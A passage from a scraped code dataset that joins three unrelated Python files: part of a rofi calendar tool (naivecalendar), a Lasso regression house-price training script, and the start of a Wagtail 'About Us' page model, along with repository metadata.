in strip_list(SYM_GO_TODAY):\n cdate.now()\n else:\n is_match = False\n\n return cdate, is_match\n\n\ndef process_event_popup(out, cdate):\n \"\"\"React to rofi event hat open a popup window\n\n Parameters\n ----------\n out : str\n rofi output\n cdate : CacheDate\n current month\n \"\"\"\n\n out = out.strip()\n if out in strip_list(SYM_SHOW_EVENTS):\n show_events(cdate.date)\n elif out in strip_list(SYM_SHOW_HELP):\n display_help()\n elif out in strip_list(SYM_SWITCH_THEME):\n ask_theme()\n elif out in strip_list(SYM_SWITCH_EVENT):\n ask_event_to_display()\n elif out in strip_list(SYM_SHOW_MENU):\n show_menu(cdate)\n elif out in strip_list(SYM_GO_TODAY):\n cdate.now()\n cdate.write_cache()\n else:\n for sym_act, cmd_act in ((act['sym'], act['cmd']) for act in CUSTOM_ACTIONS.values()):\n if out in strip_list(sym_act):\n execute_external_cmd(cmd_act)\n break\n\n\ndef update_rofi(date, is_first_loop):\n \"\"\"generate and send calendar data to stdout/rofi\n\n It use the rofi `custom script mode `_ to communicate with rofi\n and `pango markup `_ for theming\n\n Parameters\n ----------\n date : datetime.date\n A day of the month to display\n is_first_loop : bool\n True on first loop, if true, update today highlights\n \"\"\"\n\n date_prompt = date.strftime(PROMT_DATE_FORMAT).title()\n print(f\"\\0prompt\\x1f{date_prompt}\\n\")\n\n events_inds = get_month_events_ind(date)\n print(f\"\\0urgent\\x1f{events_inds}\\n\")\n\n if is_first_loop or IS_LOOP_TODAY_HEAD_MSG:\n today_ind = cal2rofi_ind(date.day, date.month, date.year)\n print(f\"\\0active\\x1f{today_ind}\\n\")\n if IS_TODAY_HEAD_MSG:\n msg = date.strftime(TODAY_HEAD_MSG_TXT)\n print(f\"\\0message\\x1f{msg}\\n\")\n\n if not ROW_DAY_NAMES == EMPTY:\n week_sym_row = get_row_rofi_inds(ROW_DAY_NAMES)\n print(f\"\\0active\\x1f{week_sym_row}\\n\")\n\n if not ROW_BAR_1 == EMPTY:\n control_sym_row =get_row_rofi_inds(ROW_BAR_1)\n print(f\"\\0active\\x1f{control_sym_row}\\n\")\n\n if not ROW_BAR_2 == EMPTY:\n shortcut_sym_row = get_row_rofi_inds(ROW_BAR_2)\n print(f\"\\0active\\x1f{shortcut_sym_row}\\n\")\n\n cal = get_calendar_from_date(date)\n print(cal)\n\n\ndef get_calendar_from_date(date):\n r\"\"\"Return a montly calendar given date\n\n Calendar is a string formated to be shown by rofi (i.e. column bu column)::\n\n L M M J V S D\n 1\n 2 3 4 5 6 7 8\n date -> 9 10 11 12 13 14 15 -> 'L\\n \\n2\\n9\\n16\\n23\\n30\\n<\\nM\\n \\n3\\n10\\n17\\n24\\n...'\n 16 17 18 19 20 21 22\n 23 24 25 26 27 28 29\n 30\n\n Parameters\n ----------\n date : datetime.date\n Any day of the month to display\n\n Returns\n -------\n str\n A str that contain chained columns of a calendar in a rofi format\n\n \"\"\"\n\n start_day, month_length = calendar.monthrange(date.year, date.month)\n\n # init calendar with NB_WEEK blank week\n cal = [\" \"] * NB_WEEK * NB_COL\n\n # fill with day numbers\n ind_first_day = (start_day - (FIRST_DAY_WEEK - 1)) % 7\n ind_last_day = ind_first_day + month_length\n cal[ind_first_day : ind_last_day] = SYMS_DAYS_NUM[:month_length]\n\n # join calendar parts given user order\n index = (ROW_DAY_NAMES, ROW_CAL_START, ROW_BAR_1, ROW_BAR_2)\n content = [SYMS_WEEK_DAYS, cal, SYMS_BAR_1, SYMS_BAR_2]\n index, content = (list(x) for x in zip(*sorted(zip(index, content))))\n\n # transform\n cal = list(chain(*content)) # row-by-row list\n cal = list_transpose(cal) # col-by-col list\n cal = list2rofi(cal) # rofi formated\n\n return cal\n\n\ndef list_transpose(lst, col_nb=NB_COL):\n \"\"\"\n Transpose (math) a row by row list into column by column list\n given column number\n\n Parameters\n ----------\n lst : list\n row by row elements\n col_nb : int\n number of column to display\n\n Returns\n -------\n list\n A list that represent column by column elements\n\n Examples\n --------\n >>> my_list = [1,2,3,4,5,6]\n >>> list_transpose(my_list, col_nb=3)\n [1,4,2,5,3,6]\n\n \"\"\"\n\n # split into row\n iter_col = range(len(lst) // col_nb)\n row_list = [lst[i * col_nb : (i + 1) * col_nb] for i in iter_col]\n\n # transpose : take 1st element for each row, then 2nd...\n iter_row = range(len(row_list[0]))\n col_list = [[row[i] for row in row_list] for i in iter_row]\n\n # chain columns\n lst = list(chain(*col_list))\n\n return lst\n\n\ndef list2rofi(datas):\n \"\"\"\n Convert python list into a list formatted for rofi\n\n Parameters\n ----------\n datas : list\n elements stored in a list\n\n Returns\n -------\n str\n elements separated by line-breaks\n\n Examples\n --------\n\n >>> my_list = [1,2,3,4,5,6]\n >>> list2rofi(my_list]\n \"1\\\\n2\\\\n3\\\\n4\\\\n5\\\\n6\"\n \"\"\"\n\n return \"\\n\".join(datas)\n\n\ndef rofi2list(datas):\n \"\"\"\n Convert list formatted for rofi into python list object\n\n Parameters\n ----------\n datas : str\n a string with element separeted by line-breaks\n\n Returns\n -------\n list\n elements of datas in a list\n\n Examples\n --------\n\n >>> rofi_list = \"1\\\\n2\\\\n3\\\\n4\\\\n5\\\\n6\"\n >>> rofi2list\n [1,2,3,4,5,6]\n \"\"\"\n\n return datas.split(\"\\n\")\n\n\ndef parse_month_events_files(date):\n \"\"\"\n Return a list of file's first line of a specific month\n\n Parameters\n ----------\n date : datetime.date\n Any day of the month to display\n\n Returns\n -------\n str\n A rofi formatted list of month's events first line\n str\n Rows to highlight (date header)\n \"\"\"\n\n # paths\n events_paths = get_month_events(date)\n\n if not events_paths:\n return \"No events this month\", 0\n else:\n # first line\n heads = [parse_event_file(n) for n in events_paths]\n # file name\n prompts = [Path(n).stem for n in events_paths]\n # sort by file name (usually by date)\n prompts, heads = (list(x) for x in zip(*sorted(zip(prompts, heads))))\n\n prompts_pos = [0]\n for head in heads[:-1]:\n prompts_pos += [prompts_pos[-1] + len(head.split('\\n'))]\n prompts_pos = ','.join(str(x) for x in prompts_pos)\n\n # return : : for each event\n text = \"\\n\".join([f\"{p} : {h}\" for p, h in sorted(zip(prompts, heads))])\n\n return text, prompts_pos\n\n\ndef parse_event_file(event_path):\n \"\"\"Parse event file for compact display\n\n **Event format:**\n\n - Section ::\n\n [9H30] rdv with truc <---- will be displayed\n Some text\n Some text again\n [14H30] rdv with muche <----- will be displayed\n Some text again again\n\n - header ::\n\n # Note Title <---- only first line is displayed\n Some text\n Some text again...\n\n Parameters\n ----------\n event_path : str\n A text file path\n\n Returns\n -------\n str\n Parsed lines\n \"\"\"\n\n with open(event_path, \"r\") as f:\n note_txt = f.read()\n\n # get lines with [section]\n head = list(re.findall('\\[.*\\].*', note_txt))\n\n if head: # if sections\n return '\\n' + '\\n'.join(head) # join them into multilines\n else: # otherwise\n return '\\n' + note_txt.split(\"\\n\")[0] # get first line\n\n\ndef get_row_rofi_inds(row):\n \"\"\"Get all rofi index of a row\n\n Parameters\n ----------\n row : int\n row number (start at 0)\n\n Returns\n -------\n str\n a ',' separate list of rofi indexes\n \"\"\"\n\n return \",\".join(str(i * NB_ROW + row) for i in range(NB_COL))\n\n\n\ndef cal2rofi_ind(day, month, year):\n \"\"\"\n Convert calendar date into coordinates for rofi\n\n Parameters\n ----------\n day : int\n A day number (1-31)\n month : int\n A month number (1-12)\n year : int\n A year number\n\n Returns\n -------\n int\n A rofi index\n \"\"\"\n\n # day number area offset in calendar\n cal_offset = NB_COL * ROW_CAL_START\n\n # offset due to first month day\n start_day, _ = calendar.monthrange(year, month)\n # and correct by day starting the week\n ind_start_day = (start_day - (FIRST_DAY_WEEK - 1)) % 7\n\n # make month start at 0\n day = int(day) - 1\n\n # row-by-row index\n ind_r = cal_offset + day + ind_start_day\n # calendar coordinate\n row, col = ind_r // NB_COL, ind_r % NB_COL\n # rofi coordinate (column-by-column index)\n ind_c = col * NB_ROW + row\n\n return ind_c\n\n\ndef get_month_events(date):\n \"\"\"\n Return events files paths that are attached to date's month\n\n Parameters\n ----------\n date : datetime.date\n Any day of the month displayed\n\n Returns\n -------\n list\n list of files that belong to date.month\n \"\"\"\n\n # folder of the actual watched events\n path = EVENTS_PATHS[EVENTS_DEFAULT]\n\n # transform all directive '< montth' into regex\n # \"%a-%d-%b-%m-%Y\" --> \"[a-zA-Z.]*-[0-9]*-%b-%m-%Y\"\n file_pattern = re.sub('%-{0,1}[dwjhHIMSfzZ]', '[0-9]*', str(path))\n file_pattern = re.sub('%[aAp]', '[a-zA-Z.]*', file_pattern)\n\n # format all others directives (>= month) with date\n # \"[a-zA-Z.]*-[0-9]*-%b-%m-%Y\" --> \"[a-zA-Z.]*-[0-9]*-Jan.-01-2021\"\n file_pattern = date.strftime(file_pattern) #f\"{date.year}-{date.month}-\"\n\n # return all elements that belong to current month (match previous regex)\n path = Path(file_pattern)\n events_paths = list(Path(path.parent).glob(path.name))\n\n return events_paths\n\n\ndef get_month_events_ind(date):\n \"\"\"\n Return rofi-formatted index of days with attached event\n\n Parameters\n ----------\n date : datetime.date\n Any day of the month displayed\n\n Returns\n -------\n str\n Column index list formatted for rofi\n \"\"\"\n\n # get file list\n events_paths = get_month_events(date)\n # event name\n date_format = EVENTS_PATHS[EVENTS_DEFAULT].name\n # make capture group for day number (%d)\n pattern = re.sub('%d',r'([0-9]*)', date_format)\n # create pattern for directives < month\n pattern = re.sub('%-{0,1}[dwjhHIMSfzZ]',r'[0-9]*', pattern)\n pattern = re.sub('%[aAp]',r'[a-zA-Z.]*', pattern)\n # replace other (>= month) with real date\n pattern = date.strftime(pattern)\n # match the day (%d) capture group for each event in events_paths\n days = [re.match(pattern, f.name).group(1) for f in events_paths]\n # transform into rofi index\n inds = [cal2rofi_ind(int(d), date.month, date.year) for d in days]\n # format into rofi command\n inds = \",\".join([str(i) for i in inds])\n\n return inds\n\n# Count recursive call from open_n_reload_rofi\n# and prevent relaunching rofi if it's already planned\nROFI_RELAUNCH_COUNT = 0\n\ndef open_n_reload_rofi(func):\n \"\"\" decorator to open and reload the rofi script at the same date\"\"\"\n\n script_path = DIRNAME# os.path.abspath(os.path.dirname(sys.argv[0]))\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n\n global ROFI_RELAUNCH_COUNT\n\n ROFI_RELAUNCH_COUNT += 1\n subprocess.Popen([\"pkill\", \"-9\", \"rofi\"])\n time.sleep(ROFI_RELOAD_TEMPO)\n\n out = func(*args)\n\n ROFI_RELAUNCH_COUNT -= 1\n if ROFI_RELAUNCH_COUNT == 0:\n time.sleep(ROFI_RELOAD_TEMPO)\n #cmd_args = ' '.join(sys.argv[1:-1])\n cmd_args = sys.argv[1:-1] # 1 = command name, -1 = rofi outpub\n cmd = (str(DIRNAME / \"naivecalendar.sh\"), '-c', *cmd_args)\n #os.system(cmd)\n subprocess.Popen(cmd)\n\n return out\n\n return wrapper\n\n\n@open_n_reload_rofi\ndef show_events(date):\n \"\"\"open rofi popup with events list of selected month\n\n Parameters\n ----------\n date : datetime.date\n current month\n \"\"\"\n\n # Show month events\n parsed_events, prompts_pos = parse_month_events_files(date)\n output = rofi_popup(EVENTS_DEFAULT, parsed_events, highlights=prompts_pos, nb_lines=10)\n\n # open event file of selected day\n event= EVENTS_PATHS[EVENTS_DEFAULT]\n\n event_folder = date.strftime(str(event.parent))\n event_name = output.split(':')[0].strip()\n event_ext = event.suffix\n\n event_path = f'{event_folder}/{event_name}{event_ext}'\n\n if os.path.isfile(event_path):\n edit_event_file(event_path)\n\n\n@open_n_reload_rofi\ndef show_menu(cdate):\n \"\"\"open popup menu\n\n (list .cfg SHORTCUTS section entries)\"\"\"\n\n menu = '\\n'.join([to_list(cfg_t['SHORTCUTS'][s])[-1] for s in cfg_t['SHORTCUTS']])\n menu += '\\n' + '\\n'.join([act['sym'][-1] for act in CUSTOM_ACTIONS.values()])\n output = rofi_popup(\"menu\", menu, nb_lines=7, width='20em')\n process_event_popup(output, cdate)\n\n\n#@open_n_reload_rofi\ndef open_event(day_sym, date, editor):\n \"\"\"open event with editor for the selected date\"\"\"\n\n day_ind = strip_list(SYMS_DAYS_NUM).index(day_sym) +1\n\n date_format = str(EVENTS_PATHS[EVENTS_DEFAULT])\n event_path = datetime.date(date.year, date.month, day_ind).strftime(date_format)\n\n edit_event_file(event_path, editor)\n\n\n@open_n_reload_rofi\ndef edit_event_file(event_path, editor=ARGS.editor):\n \"\"\"open event file with text editor\"\"\"\n\n event_folder = Path(event_path).parent\n if not os.path.isdir(event_folder):\n os.makedirs(event_folder)\n Path(event_path).touch()\n cmd = (*editor.split(' '), event_path)\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n sdtout, sdterr = p.communicate()\n\n\n@open_n_reload_rofi\ndef ask_event_to_display():\n \"\"\"Popup that show all events type\"\"\"\n\n events = list(EVENTS_PATHS.keys())\n events = list2rofi(events)\n\n event = rofi_popup(f\"select what to display (actual = {EVENTS_DEFAULT})\", events, nb_lines=6)\n\n set_event_cache(event)\n\n\n@open_n_reload_rofi\ndef ask_theme():\n \"\"\"Search themes in paths and open a popup\"\"\"\n\n themes = list(chain(*[glob.glob(f'{path}/*.rasi') for path in THEME_PATHS.values()]))\n themes = (t.split('/')[-1].split('.')[0]for t in themes)\n themes = list2rofi(sorted(set(themes)))\n #themes = '\\n'.join((t.split('/')[-1] for t in themes))\n\n theme = rofi_popup(\"select theme\", themes, nb_col=3, nb_lines=9, width='45em')\n if theme in themes:\n set_theme_cache(theme)\n else :\n print(\"this is not a valid theme\", file=sys.stderr)\n\n@open_n_reload_rofi\ndef execute_external_cmd(cmd):\n \"\"\"Execute an external system command\n try to find command in different directories:\n\n - in $HOME/.config/naivecalendar/scripts/, then in\n - in ./scripts/, then\n - in system path\n \"\"\"\n cmd_path = Path(cmd[0])\n\n if (SCRIPT_PATHS['user'] / cmd_path).exists():\n cmd = [str(SCRIPT_PATHS['user'] / cmd_path)] + cmd[1:]\n elif (SCRIPT_PATHS['rel'] / cmd_path).exists():\n cmd = [str(SCRIPT_PATHS['rel'] / cmd_path)] + cmd[1:]\n\n subprocess.Popen(cmd)\n\ndef set_pp_date(day, date, f):\n \"\"\"write date to cache with command line specified format\"\"\"\n\n d = int(day)\n m = date.month\n y = date.year\n\n pretty_date = datetime.date(y, m, d).strftime(f)\n with open(PP_CACHE, \"w\") as f:\n f.write(pretty_date + \"\\n\")\n\n\n@open_n_reload_rofi\ndef send2clipboard(day, date, f):\n \"\"\"return select date to stdout given cmd line parameter '--format'\"\"\"\n\n if shutil.which(\"xclip\") == None:\n print(\"\\nplease install xclip to use 'copy-to-clipboard' option (-x/--clipboard)\\n\", file=sys.stderr)\n sys.exit(0)\n\n d = int(day)\n m = date.month\n y = date.year\n\n pretty_date = datetime.date(y, m, d).strftime(f)\n p = subprocess.Popen(('echo', pretty_date), stdout=subprocess.PIPE)\n subprocess.check_output(('xclip', '-selection', 'clipboard'), stdin=p.stdout)\n\n sys.exit(0)\n\n\ndef first_time_init():\n \"\"\"Create config files and paths given script head variables\"\"\"\n\n if shutil.which(\"rofi\") == None:\n print(\"please install rofi\")\n sys.exit()\n\n if not os.path.exists(THEME_PATHS['user']):\n os.makedirs(THEME_PATHS['user'])\n\n if not os.path.exists(SCRIPT_PATHS['user']):\n os.makedirs(SCRIPT_PATHS['user'])\n\n for events_path in EVENTS_PATHS.values():\n if not os.path.exists(events_path.parent):\n os.makedirs(events_path.parent)\n\n if not os.path.exists(CACHE_PATH):\n os.mkdir(CACHE_PATH)\n date = datetime.date.today()\n date_buff = configparser.ConfigParser()\n date_buff[\"buffer\"] = {\"year\": date.year, \"month\": date.month}\n with open(DATE_CACHE, 'w') as date_cache:\n date_buff.write(date_cache)\n display_help(head_txt=\"Welcome to naivecalendar\")\n\n\nclass CacheDate:\n \"\"\"Class to store date\n Make easier reading and writing to date cache file\n Make easier operation on date\n\n Attributes\n ----------\n\n year : Year\n month: Month\n\n \"\"\"\n\n def __init__(self):\n\n self.now()\n self._cache = configparser.ConfigParser()\n self.year = Year(self)\n self.month = Month(self)\n\n def now(self):\n \"\"\"Set and return today date\"\"\"\n self.date = datetime.datetime.now()\n return self.date\n\n def set_month(self, month):\n \"\"\"Set and return date of the given Month\n\n Parameters\n ----------\n month : str\n month to set in '%m-%Y' format\n\n Returns\n -------\n datetime.date\n a day of the month\n \"\"\"\n\n m, y = [int(x) for x in month.split('-')]\n self.date = datetime.date(y,m,1)\n\n return self.date\n\n def read_cache(self):\n \"\"\"load cache ini file\"\"\"\n\n self._cache.read(DATE_CACHE)\n day = 1\n month = int(self._cache[\"buffer\"][\"month\"])\n year = int(self._cache[\"buffer\"][\"year\"])\n\n self.date = datetime.date(year, month, day)\n\n def write_cache(self):\n \"\"\"write date to ini cache file\"\"\"\n\n date = self.date\n self._cache[\"buffer\"] = {\"year\": date.year, \"month\": date.month}\n with open(DATE_CACHE, \"w\") as buff:\n self._cache.write(buff)\n\n\nclass Year:\n \"\"\"Make computation on date years\"\"\"\n def __init__(self, outer):\n self.outer = outer\n\n def __repr__(self):\n return f\"Year({self.outer.date.year})\"\n\n def __add__(self, years):\n \"\"\"\n Increment or decrement date by a number of years\n\n Parameters\n ----------\n sourcedate : datetime.date\n CacheDate to Increment\n months : int\n number of years to add\n\n Returns\n -------\n datetime.date\n Incremented date\n \"\"\"\n\n year = self.outer.date.year + years\n month = self.outer.date.month\n day = min(self.outer.date.day, calendar.monthrange(year, month)[1])\n self.outer.date = datetime.date(year, month, day)\n\n def __sub__(self, years):\n self.__add__(-years)\n\n\nclass Month:\n \"\"\"Make computation on date months\"\"\"\n def __init__(self, outer):\n self.outer = outer\n\n def __repr__(self):\n return f\"Month({self.outer.date.month})\"\n\n def __add__(self, months):\n \"\"\"\n Increment or decrement date by a number of month\n\n Parameters\n ----------\n sourcedate : datetime.date\n CacheDate to Increment\n months : int\n number of month to add\n\n Returns\n -------\n datetime.date\n Incremented date\n \"\"\"\n\n month = self.outer.date.month - 1 + months\n year = self.outer.date.year + month // 12\n month = month % 12 + 1\n day = min(self.outer.date.day, calendar.monthrange(year, month)[1])\n\n self.outer.date = datetime.date(year, month, day)\n # return datetime.date(year, month, day)\n\n def __sub__(self, months):\n self.__add__(-months)\n\n\ndef joke(sym):\n \"\"\"Just display stupid jokes in french\"\"\"\n\n if sym == DAY_FORMAT.format(\"\"):\n print(\n \"Vous glissez entre les mois, vous perdez la notion du temps.\",\n file=sys.stderr,\n )\n elif sym in SYMS_WEEK_DAYS:\n print(\"Ceci n'est pas un jour! R.Magritte.\", file=sys.stderr)\n\n\ndef set_theme_cache(selected):\n \"\"\"Write theme name to cache file\"\"\"\n\n with open(THEME_CACHE, 'w') as f:\n f.write(selected)\n\n\ndef set_event_cache(selected):\n \"\"\"Write theme name to cache file\"\"\"\n\n with open(EVENT_CACHE, 'w') as f:\n f.write(selected)\n\n\ndef rofi_popup(txt_head, txt_body, nb_lines=15, nb_col=1, width='40%', highlights=1000):\n \"\"\"Launch a rofi window\n\n Parameters\n ----------\n txt_body : str\n Text to display in rofi window\n txt_head : str\n Text to display in rofi prompt\n\n Returns\n -------\n str\n Rofi selected cell content\n \"\"\"\n\n cmd = subprocess.Popen(('echo', txt_body), stdout=subprocess.PIPE)\n\n theme_str = f'''\n @import \"{THEME_RASI_FILE}\"\n #window {{\n location: center;\n width: {width};\n }}\n #listview {{\n columns: {nb_col};\n lines: {nb_lines};\n witdh: {width};\n }}\n '''\n\n #rofi_cmd = f'''rofi -dmenu -theme-str '{theme_str}' -p \"{txt_head}\" -u {highlights}'''\n rofi_cmd = ('rofi', '-dmenu', '-theme-str', theme_str, '-p', txt_head, '-u', str(highlights))\n selection = (\n subprocess.check_output(rofi_cmd, stdin=cmd.stdout)\n .decode(\"utf-8\")\n .replace(\"\\n\", \"\")\n )\n\n return selection\n\n\n@open_n_reload_rofi\ndef display_help(head_txt=\"help:\"):\n \"\"\"Show a rofi popup with help message\"\"\"\n\n\n txt = f\"\"\"NaïveCalendar {__version__}\n\nUsage:\n - Use mouse or keyboard to interact with the calendar.\n - Hit bottom arrows to cycle through months.\n - Hit a day to create a linked event.\n(A day with attached event will appear yellow.)\n - Create multiple event type and with between them\n\nShortcuts (type it in rofi prompt) :\"\"\"\n\n txt += '\\n{:>20} : display this help'.format(','.join(SYM_SHOW_HELP[:-1]))\n txt += '\\n{:>20} : go to previous year'.format(','.join(SYM_PREV_YEAR))\n txt += '\\n{:>20} : go to previous month'.format(','.join(SYM_PREV_MONTH))\n txt += '\\n{:>20} : go to next month'.format(','.join(SYM_NEXT_MONTH))\n txt += '\\n{:>20} : go to next year'.format(','.join(SYM_NEXT_YEAR))\n txt += '\\n{:>20} : display events of the month (first line)'.format(','.join(SYM_SHOW_EVENTS[:-1]))\n txt += '\\n{:>20} : switch events folder to display'.format(','.join(SYM_SWITCH_EVENT[:-1]))\n txt += '\\n{:>20} : show theme selector'.format(','.join(SYM_SWITCH_THEME[:-1]))\n txt += '\\n{:>20} : display a selection menu (skip shortcuts)'.format(','.join(SYM_SHOW_MENU[:-1]))\n\n txt += f\"\"\"\\n\nCommand line option:\n\nsubcommands:\n update-themes Update a calendar parameter for all user themes at once\n add-event Add, modify, delete event in all user themes config at once\n configure Clone or open configuration files\n\noptional arguments:\n -h, --help\n -V, --version\n -v, --verbose\n -p, --print\n -x, --clipboard\n -f FORMAT, --format FORMAT\n -e EDITOR, --editor EDITOR\n -l LOCALE, --locale LOCALE\n -c, --read-cache\n -t THEME, --theme THEME\n -d DATE, --date DATE\n\nThat's all : press enter to continue...\n\"\"\"\n\n rofi_popup(\"Help\", txt, nb_lines=20, width='45em')\n\n\nif __name__ == \"__main__\":\n main(ARGS, ROFI_OUTPUT)\n\n #print(\"loop time =\", \"{:.2f}\".format(1000*(time.time() - START)), 'ms', file=sys.stderr)\n\n","repo_name":"Daguhh/naivecalendar","sub_path":"src/naivecalendar.py","file_name":"naivecalendar.py","file_ext":"py","file_size_in_byte":38383,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"94"} +{"seq_id":"24298008565","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 6 14:28:42 2021\n\n@author: abdul\n\"\"\"\n\n# to handle datasets\nimport pandas as pd\nimport numpy as np\n\n# for plotting\nimport matplotlib.pyplot as plt\n\n# to save the model\nimport joblib\n\n# to build the model\nfrom sklearn.linear_model import Lasso\n\n# to evaluate the model\nfrom sklearn.metrics import mean_squared_error, r2_score\n\n# to visualise al the columns in the dataframe\npd.pandas.set_option('display.max_columns', None)\n\n\n# to find out how to create these datasets\n\nX_train = pd.read_csv('xtrain.csv')\nX_test = pd.read_csv('xtest.csv')\n\nX_train.head()\n\n\ny_train = pd.read_csv('ytrain.csv')\ny_test = pd.read_csv('ytest.csv')\n\ny_train.head()\n\n# load the pre-selected features\n# ==============================\nfeatures = pd.read_csv('selected_features.csv')\nfeatures = features['0'].to_list() \n\n# display final feature set\nfeatures\n\n# reduce the train and test set to the selected features\n\nX_train = X_train[features]\nX_test = X_test[features]\n\n\n\nlin_model = Lasso(alpha=0.001, random_state=0)\n\n# train the model\n\nlin_model.fit(X_train, y_train)\n\n# make predictions for train set\npred = lin_model.predict(X_train)\n\n# determine mse, rmse and r2\nprint('train mse: {}'.format(int(\n mean_squared_error(np.exp(y_train), np.exp(pred)))))\nprint('train rmse: {}'.format(int(\n mean_squared_error(np.exp(y_train), np.exp(pred), squared=False))))\nprint('train r2: {}'.format(\n r2_score(np.exp(y_train), np.exp(pred))))\nprint()\n\n# make predictions for test set\npred = lin_model.predict(X_test)\n\n# determine mse, rmse and r2\nprint('test mse: {}'.format(int(\n mean_squared_error(np.exp(y_test), np.exp(pred)))))\nprint('test rmse: {}'.format(int(\n mean_squared_error(np.exp(y_test), np.exp(pred), squared=False))))\nprint('test r2: {}'.format(\n r2_score(np.exp(y_test), np.exp(pred))))\nprint()\n\nprint('Average house price: ', int(np.exp(y_train).median()))\n\n\n# let's evaluate our predictions respect to the real sale price\nplt.scatter(y_test, lin_model.predict(X_test))\nplt.xlabel('True House Price')\nplt.ylabel('Predicted House Price')\nplt.title('Evaluation of Lasso Predictions')\n\ny_test.reset_index(drop=True)\n\n# they should be fairly normally distributed\ny_test.reset_index(drop=True, inplace=True)\n\npreds = pd.Series(lin_model.predict(X_test))\n\npreds\n\n# they should be fairly normally distributed\nerrors = y_test['SalePrice'] - preds\nerrors.hist(bins=30)\nplt.show()\n\n\n# Finally, just for fun, let's look at the feature importance\nimportance = pd.Series(np.abs(lin_model.coef_.ravel()))\nimportance.index = features\nimportance.sort_values(inplace=True, ascending=False)\nimportance.plot.bar(figsize=(18,6))\nplt.ylabel('Lasso Coefficients')\nplt.title('Feature Importance')\n\n\n\n# we save Model\n# to score new data\n\njoblib.dump(lin_model, 'linear_regression.joblib') \n\n\n\n\n\n\n\n\n","repo_name":"2ahmedabdullah/Advanced-Linear-Regression-Project","sub_path":"4_model_training.py","file_name":"4_model_training.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"37486968332","text":"from django.db import models\nfrom wagtail.search import index\nfrom nsra.base.validators import phone_validator\nfrom wagtail.core.models import Page, Orderable\nfrom django.core.exceptions import ValidationError\nfrom wagtail.images.edit_handlers import ImageChooserPanel\nfrom wagtail.core.fields import RichTextField, StreamField\nfrom modelcluster.fields import ParentalKey, ParentalManyToManyField\nfrom wagtail.contrib.forms.models import AbstractFormField, AbstractEmailForm, AbstractForm\nfrom nsra.base.blocks import BaseStreamBlock, ParagraphStreamBlock, ImageBlock\nfrom wagtail.contrib.settings.models import BaseSetting, register_setting\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom wagtail.admin.edit_handlers import TabbedInterface, ObjectList\nfrom wagtail.snippets.edit_handlers import SnippetChooserPanel\nfrom nsra.news_and_events.models import NewsEventsIndexPage\nfrom wagtail.snippets.models import register_snippet\nfrom modelcluster.models import ClusterableModel\nfrom wagtail.core.blocks import StreamBlock\nfrom modelcluster.fields import ParentalKey\nfrom nsra.base.blocks import BaseStreamBlock\nfrom nsra.base.models import StandardPage\nfrom nsra.base.choices import COLORS\nfrom django import forms\nimport datetime\nfrom wagtail.admin.edit_handlers import (\n StreamFieldPanel,\n PageChooserPanel,\n MultiFieldPanel,\n FieldRowPanel,\n InlinePanel,\n FieldPanel,\n)\n\nfrom nsra.regional_profiles.models import RegionalProfilePage\n\nclass AboutUsPageCoreFunctionOrderable(Orderable):\n page = ParentalKey('about_us.AboutUsPage', on_delete=models.CASCADE, related_name='functions')\n function = models.ForeignKey('core_functions.CoreFunction', on_delete=models.CASCADE)\n\n panels = [\n SnippetChooserPanel('function'),\n ]\n\n\nclass AboutUsPageCarouselImages(Orderable):\n \"\"\"Between 1 and 5 images for the home page carousel.\"\"\"\n\n page = ParentalKey(\"about_us.AboutUsPage\", related_name=\"carousel_images\")\n carousel_image = models.ForeignKey(\n \"wagtailimages.Image\",\n null=True,\n blank=False,\n on_delete=models.SET_NULL,\n related_name=\"+\",\n )\n\n panels = [ImageChooserPanel(\"carousel_image\")]\n\nclass ExecutiveOrderable(Orderable):\n page = ParentalKey('about_us.AboutUsPage', on_delete=models.CASCADE, related_name='executives')\n executive = models.ForeignKey('executive.Executive', on_delete=models.CASCADE)\n\n panels = [\n SnippetChooserPanel('executive'),\n ]\n\nclass RelatedOrganizationOrderable(Orderable):\n page = ParentalKey('about_us.AboutUsPage', on_delete=models.CASCADE, related_name='related_organizations')\n organization = models.ForeignKey('base.RelatedOrganization', on_delete=models.CASCADE)\n\n panels = [\n SnippetChooserPanel('organization'),\n ]\n\n# REGIONAL PROFILES\n \nclass AboutUsPage(StandardPage):\n \n templates = \"about_us/about_us_page.html\"\n max_count = 1\n\n body = StreamField(\n [\n ('base', BaseStreamBlock()), # each block is stacked in template \n ('grid', StreamBlock( # each block is arranged in 2 grid system\n [ \n ('paragraph', ParagraphStreamBlock()), # each block is stacked in template \n ('image', ImageBlock()),\n ]\n ))\n ],\n null=True,\n blank=True\n )\n\n executive_panels = [\n InlinePanel('executives', min_num=0),\n ]\n\n organization_panels = [\n InlinePanel('related_organizations', min_num=0),\n ]\n\n # mission\n # add validation here for when there is title description required\n mission_title = models.CharField( \n max_length=1000,\n verbose_name='Section CTA link',\n help_text='mission title here',\n default='MISSION'\n )\n mission_sub_title = models.CharField(\n max_length=1000,\n verbose_name='mission sub title',\n help_text='mission subtitle here', null=True, blank=True\n )\n mission_description = models.TextField(null=True, blank=True)\n mission_icon = models.ForeignKey('wagtailimages.Image', on_delete=models.SET_NULL, related_name='+', null=True, blank=True)\n\n # vision\n\n vision_title = models.CharField(\n max_length=1000,\n verbose_name='vision title',\n help_text='vision title here',\n default='VISION'\n )\n vision_sub_title = models.CharField(\n max_length=1000,\n verbose_name='vision subtitle',\n help_text='vision subtitle here', null=True, blank=True\n )\n vision_description = models.TextField(null=True, blank=True)\n vision_icon = models.ForeignKey('wagtailimages.Image', on_delete=models.SET_NULL, related_name='+', null=True, blank=True)\n\n # mandate\n\n mandate_title = models.CharField(\n max_length=1000,\n verbose_name='mandate title',\n help_text='mandate title here',\n default='MANDATE'\n )\n mandate_sub_title = models.CharField(\n max_length=1000,\n verbose_name='mandate subtitle',\n help_text='mandate subtitle here', null=True, blank=True\n )\n mandate_description = models.TextField(null=True, blank=True)\n mandate_icon = models.ForeignKey('wagtailimages.Image', on_delete=models.SET_NULL, related_name='+', null=True, blank=True)\n \n\n # core functions\n functions_title = models.CharField(max_length=1000, null=True, blank=True, verbose_name='title',)\n functions_sub_title = models.CharField(max_length=1000, null=True, blank=True, 